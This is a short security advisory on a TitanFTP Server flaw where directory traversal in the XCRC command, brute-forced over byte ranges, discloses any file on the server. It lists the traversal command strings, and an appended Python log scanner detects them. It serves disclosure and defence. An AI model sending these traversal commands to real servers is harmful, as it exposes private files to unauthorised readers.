
TitanFTP Server Arbitrary File Disclosure






Accensus Security Advisory L-02: TitanFTP Server Arbitrary File Disclosure

Details
==============

Product: TitanFTP Server

Security-Risk: high

Remote-Exploit: maybe, assuming anonymous FTP access

Local-Exploit: yes

Vendor URL: http://www.southrivertech.com/

Found By: Bill Finlayson

http://www.accensussecurity.com

Affected: Versions 8.10.1125 and likely previous

Issue: the XCRC command is susceptible to a directory traversal attack, which allows disclosure of the contents of any file on the server.

Details: xcrc ..//..//..//..//a.txt 1 will disclose the file's size.

xcrc ..//..//..//..//a.txt 1 2
xcrc ..//..//..//..//a.txt 1 3
...
xcrc ..//..//..//..//a.txt 1

When automated, this sequence allows an easy brute-force attack on the CRCs.

Status: Submitted to vendor 6/14/10; fixed 6/15/10.
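As an added detection example (not part of the advisory), the following Python scans a constructed FTP command log for the two signals this issue leaves behind: an XCRC path containing a `..` segment (including the `..//` spelling shown above), and one client repeatedly issuing XCRC with an explicit end offset against the same path. The log format, client addresses and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed FTP command log for illustration (assumed format:
# "<timestamp> <client-ip> <user> <COMMAND> [args]"); not from the advisory.
SAMPLE_LOG = """\
2010-06-14T10:00:01 203.0.113.5 anonymous USER anonymous
2010-06-14T10:00:02 203.0.113.5 anonymous XCRC pub/readme.txt
2010-06-14T10:00:03 203.0.113.5 anonymous XCRC ..//..//..//..//a.txt 1
2010-06-14T10:00:04 203.0.113.5 anonymous XCRC ..//..//..//..//a.txt 1 2
2010-06-14T10:00:05 203.0.113.5 anonymous XCRC ..//..//..//..//a.txt 1 3
2010-06-14T10:00:06 203.0.113.5 anonymous XCRC ..//..//..//..//a.txt 1 4
2010-06-14T10:00:07 198.51.100.9 alice XCRC reports/q2.pdf
2010-06-14T10:00:08 198.51.100.9 alice XCRC reports/q2.pdf 0 1024
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)(?: (.*))?$")

def has_traversal(path):
    """True if any segment is '..' after collapsing runs of '/' or '\\' (catches '..//')."""
    return any(seg == ".." for seg in re.split(r"[\\/]+", path))

def detect(log_text, probe_threshold=3):
    """Return (client, kind, path) alerts.
    'traversal': an XCRC path with a '..' segment.
    'range-probe': one client sent >= probe_threshold XCRC requests with an
    explicit end offset for the same path (the byte-range CRC pattern).
    XCRC arguments are split on whitespace, so paths with spaces are not handled."""
    alerts = []
    range_counts = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, _user, cmd, args = m.groups()
        if cmd.upper() != "XCRC" or not args:
            continue
        path, _start, end = (args.split() + [None] * 3)[:3]
        if has_traversal(path):
            alerts.append((client, "traversal", path))
        if end is not None:
            range_counts[(client, path)] += 1
            if range_counts[(client, path)] == probe_threshold:
                alerts.append((client, "range-probe", path))
    return alerts
```

The range-probe rule fires once per client and path when the threshold is reached, so a single legitimate ranged XCRC (alice above) produces no alert.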
